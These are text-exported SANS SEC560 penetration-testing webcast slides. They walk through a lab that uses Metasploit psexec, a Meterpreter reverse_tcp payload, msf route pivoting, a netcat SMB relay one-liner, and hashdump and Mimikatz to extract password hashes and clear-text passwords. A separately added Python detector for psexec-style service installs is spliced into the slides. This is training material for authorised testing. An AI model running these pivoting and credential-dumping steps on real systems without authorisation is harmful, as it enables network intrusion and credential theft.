SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved
A Taste of SANS SEC 560: Adventures in High-Value Pen Testing
Copyright 2015, All Rights Reserved Version 2Q15
SANS Security 560
Network Penetration Testing and Ethical Hacking
Ed Skoudis
• For Ed Skoudis to introduce himself as:
  – A penetration tester and incident handler
  – A SANS Instructor
  – A course author: SANS SEC504 & SEC560
  – The SANS Pen Test Curriculum Lead
  – Director of NetWars & CyberCity projects
04/06/2015
SEC 560 Course Outline
• 560.1: Comprehensive Planning, Scoping, and Recon
• 560.2: In-Depth Scanning
• 560.3: Exploitation & Post Exploitation
• 560.4: Password Attacks & Merciless Pivoting
• 560.5: Wireless and Web Apps
• 560.6: Full-Day Pen Test Lab and Capture the Flag Contest
About the SANS SEC 560 Course
• Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking
  – Organized around the workflow of professional testers
  – Numerous hands-on labs, culminating in a full-day end-to-end penetration test in 560.6
  – Tips for avoiding common pitfalls
• And saving time to make the tester more efficient and to make the test safer
A Formal Penetration Testing Definition
• Penetration testing involves modeling the techniques used by real-world computer attackers …
  – To find vulnerabilities …
  – And, under controlled circumstances, to exploit those flaws ...
  – In a professional, safe manner according to a carefully designed scope and rules of engagement ...
  – To determine business risk and potential impact ... all with the goal of helping the organization improve security practices
Why Exploitation?
• False positive reduction / elimination
  – But, even if the exploit doesn't work, you still may want to report on the detected vulnerability
• Proof of vulnerability and therefore more realistic treatment of risk
• Use of one machine as a pivot point to get deeper inside the network
  – More of a sense of what a real bad guy can accomplish
• Exploitation leads to post-exploitation…
  – …which really helps us understand the business risks that the target organization faces due to discovered vulnerabilities
[Diagram: Firewall, DMZ System, Internal System]
Risks of Exploitation
• Service crash
• System crash
• System stability impacted
• System integrity violated
• Data exposure with legal ramifications
  – As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information
• Inadvertently accessing the wrong system
  – Out of scope or even the wrong target organization
• Because of these concerns, verify that exploitation is allowed by the Rules of Engagement
  – And… double check for a given system whether it is in scope
• Also, understand the probabilistic nature of exploit success
The Metasploit Arsenal
• Metasploit divides up the concept of exploits, payloads, auxiliary, and post modules
  – An exploit takes advantage of a flaw in a target program
  – The payload makes the target do something the attacker wants
  – Auxiliary modules perform all kinds of tasks, including scanning
  – A post module is used in post-exploitation to plunder targets or manipulate them
[Diagram: the User Interface chooses from the Exploit Collection (Exploit 1 … Exploit N), the Payload Collection (Payload 1 … Payload M), the Auxiliary Modules (Aux 1 … Aux N) and the Post Modules (Post 1 … Post N); the Launcher combines the chosen exploit and payload and sends them to the target]
Metasploit psexec Module
• Metasploit includes a fantastic psexec module
  – It's an exploit module, although it is not really exploiting a specific vulnerability
  – Establishes an SMB session with the target RHOST using a provided admin-level SMBUser and SMBPass, causing the target to run a specified Metasploit payload
    • Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself
  – Select it at msfconsole using: msf > use exploit/windows/smb/psexec
  – Also supports pass-the-hash, authenticating to the target via an admin username and hash
  – This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched Windows internal network environment
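A defender-side check for the trail the psexec workflow above leaves on the target (a service installed with a pseudo-random name, running as SYSTEM, from a freshly written executable), added here as an example that is not part of the SANS material: it scores Windows Service Control Manager 7045 records. The event dictionaries are constructed, and the ADMIN$ path indicator and the case-flip name heuristic are assumptions chosen for illustration.

```python
import re

# Constructed sample of Windows Service Control Manager records (Event ID 7045,
# "A service was installed in the system") after log parsing. Made-up values.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "Spooler", "account": "LocalSystem",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"event_id": 7045, "service_name": "KwYhjQxZ", "account": "LocalSystem",
     "image_path": r"\\127.0.0.1\ADMIN$\XrtPvLmc.exe"},
    {"event_id": 7045, "service_name": "MyBackupAgent", "account": r"NT AUTHORITY\NetworkService",
     "image_path": r"C:\Program Files\Backup\agent.exe"},
    {"event_id": 7036, "service_name": "KwYhjQxZ", "account": "", "image_path": ""},
]

# Assumed indicator: the dropped binary is referenced through the ADMIN$ share.
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)

def looks_random(name: str) -> bool:
    """Heuristic for a pseudo-random token: 6-20 letters/digits, no separators,
    case flipping almost every character (mean same-case run under 1.6).
    Real names are words or CamelCase; all-lowercase random tokens slip past."""
    if not re.fullmatch(r"[A-Za-z0-9]{6,20}", name):
        return False
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 6:
        return False
    runs = 1 + sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return len(letters) / runs < 1.6

def score_event(ev: dict) -> list[str]:
    """Reasons a 7045 record resembles the psexec pattern described above."""
    reasons = []
    if ev["event_id"] != 7045:
        return reasons
    if looks_random(ev["service_name"]):
        reasons.append("random-looking service name")
    if ev["account"].lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    path = ev["image_path"]
    binary = re.split(r"[\\/]", path)[-1].rsplit(".", 1)[0]  # file name without extension
    if ADMIN_SHARE.match(path) or looks_random(binary):
        reasons.append("binary reached via admin share or has a random name")
    return reasons

def flag_psexec_like(events: list[dict], min_reasons: int = 3) -> list[tuple[str, list[str]]]:
    """Return (service_name, reasons) only for records matching all indicators."""
    return [(ev["service_name"], r) for ev in events
            if len(r := score_event(ev)) >= min_reasons]
```

Pairing a hit with a 7034/7036 stop event shortly after, or with the service's disappearance, matches the module's clean-up step and raises confidence further.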
Psexec & the Pen Tester’s Pledge
Meterpreter Functionality: Pivoting using Metasploit's Route Command
• Metasploit includes a "route" command to pivot through an already-exploited host via a Meterpreter session
  – Carries follow-on exploits and payloads across the Meterpreter session
  – Don't confuse this with the Meterpreter "route" command, which manages routing tables on a compromised system running Meterpreter
msf > use [exploit1]
msf > set RHOST [victim1]
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
meterpreter > (CTRL-Z to background the session… msfconsole will display the Meterpreter session id, sid)
msf > route add [victim2_subnet] [netmask] [sid]
msf > use [exploit2]
msf > set RHOST [victim2]
msf > set PAYLOAD [payload2]
msf > exploit
[Diagram: Pen Tester → Exploit1 / Meterpreter → Victim1 → Exploit2 / Payload2 → Victim2]
Sending SMB Through a Netcat Relay to Pivot through Linux
[Diagram: Attacker (SMB client) → Linux Relay Machine (nc listener, nc client) → Target Windows (SMB Service); mount share, psexec, grab hashes, etc.]
On the attacker:
C:\> net use \\Linux\c$ [password] /u:[user]
On the Linux relay machine:
# mknod backpipe p
# nc -l -p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe
Dumping Authentication Information from Memory with Mimikatz
• Mimikatz was created by Benjamin Delpy (also known as gentilkiwi)
• Pulls authentication information from memory on a Windows machine
  – Searches through LSASS memory at various specific locations, looking for password hashes and ***clear text passwords***
• Originally, a separate executable (mimikatz.exe) to load on a target machine and run
• Now, it's a Metasploit Meterpreter module
Course Roadmap
• Planning and Recon
• Scanning
• Exploitation & Post-Exploitation
• Password Attacks
  – Motivation and Defs
  – Password Attack Tips
  – Account Lockout
  – Password Guessing with THC-Hydra
    → Lab: Hydra
  – Password Representation Formats
  – Obtaining Hashes
    → Lab: Fgdump & Netcat Pivot Hashdump
  – More Hash Dumping Options
    → Lab: Msf psexec & Mimikatz
  – John the Ripper
    → Lab: John the Ripper
  – Cain
    → Lab: Cain
  – Rainbow Table Attacks
    → Lab: Ophcrack
  – Pass-the-Hash Attacks
    → Lab: Pass-the-Hash
• Wireless Attacks
• Web App Attacks
Using MSF psexec, a Netcat relay, Meterpreter, & hashdump
[Diagram: Your Linux (Metasploit: psexec, Meterpreter, hashdump) → Compromised Linux DMZ Target 10.10.75.1 (nc listener / nc client relay, TCP 4545) → Target 1 Windows 10.10.10.10 (SMB Services, TCP 445); Target 2 Windows 10.10.10.20 (SMB Services, TCP 445); Meterpreter session back to your Linux over TCP 80]
Launching Metasploit and Choosing psexec Module
Configuring Metasploit (1)
Configuring Metasploit (2)
[Diagram: Your Linux (Metasploit: psexec, Meterpreter) → Linux Target 10.10.75.1 (nc relay, TCP 4545) → Windows 10.10.10.10 (SMB, TCP 445); Meterpreter session over TCP 80]
Preparing the Relay & Exploiting
Look at the details of this session's connection, between 10.10.10.10 and your Linux box.
[Diagram: same lab layout as above: Your Linux (Metasploit, psexec, Meterpreter) → Linux Target 10.10.75.1 (nc relay, TCP 4545) → Windows 10.10.10.10 (SMB, TCP 445); Meterpreter session over TCP 80]
Dumping the Hashes
Note that "run hashdump" can also dump Windows password hints that users create, if they are present.
Using msf route to Pivot and Mimikatz
• Let's use the msf route command to pivot across our Meterpreter session on 10.10.10.10 to attack 10.10.10.20
  – Getting Meterpreter on 10.10.10.20, and then loading Mimikatz
[Diagram: Your Linux (Metasploit) holds an existing Meterpreter session over TCP 80 with DMZ Target Windows 10.10.10.10; an msf route pivots SMB through 10.10.10.10 for psexec on 10.10.10.20 (TCP 445 allowed from the 10.10.10 net), giving a new Meterpreter session over TCP 443 to DMZ Target Windows 10.10.10.20, where Mimikatz is loaded to dump hashes & passwords; the Compromised Linux DMZ Target 10.10.75.1 is also shown]
Background Session & Prepare to Attack 10.10.10.20
[Diagram: same pivot layout as above: existing Meterpreter session over TCP 80 to Windows 10.10.10.10, msf route pivoting SMB (TCP 445) through 10.10.10.10 for psexec on 10.10.10.20, new Meterpreter session over TCP 443; Linux Target 10.10.75.1]
Exploit 10.10.10.20 through Pivot
Don't worry about this "Exploit failed" warning. As long as you see "Session N created"… it worked.
As long as you see the "meterpreter >" prompt here, it worked.
Get System Info
Our session is with 10.10.10.20!
[Diagram: Your Linux (Metasploit) with the existing Meterpreter session over TCP 80 to Windows 10.10.10.10 and the new Meterpreter session over TCP 443 to Windows 10.10.10.20, where Mimikatz is loaded to dump hashes & passwords; SMB between the hosts]
Load Mimikatz and Dump Passwords
Clear text password below!
Exiting & Lab Conclusions
• In this lab, we’ve seen how to use Metasploit’s psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes
• And, we’ve seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz to dump clear-text passwords
Webcast Conclusions
• Pen testing can help a target organization better understand its risk posture and manage risks
• Penetration testers can take advantage of plentiful tools and techniques in our work: – Metasploit and the Meterpreter – Psexec for code execution via SMB – Netcat relays and msfconsole route for pivots – Hashdump and Mimikatz for credentials
• Know your tools in-depth, and never lose your focus on providing as much business value as you can in your penetration test!
It’s not the weapon that’s important.
It’s the Ninja wielding it.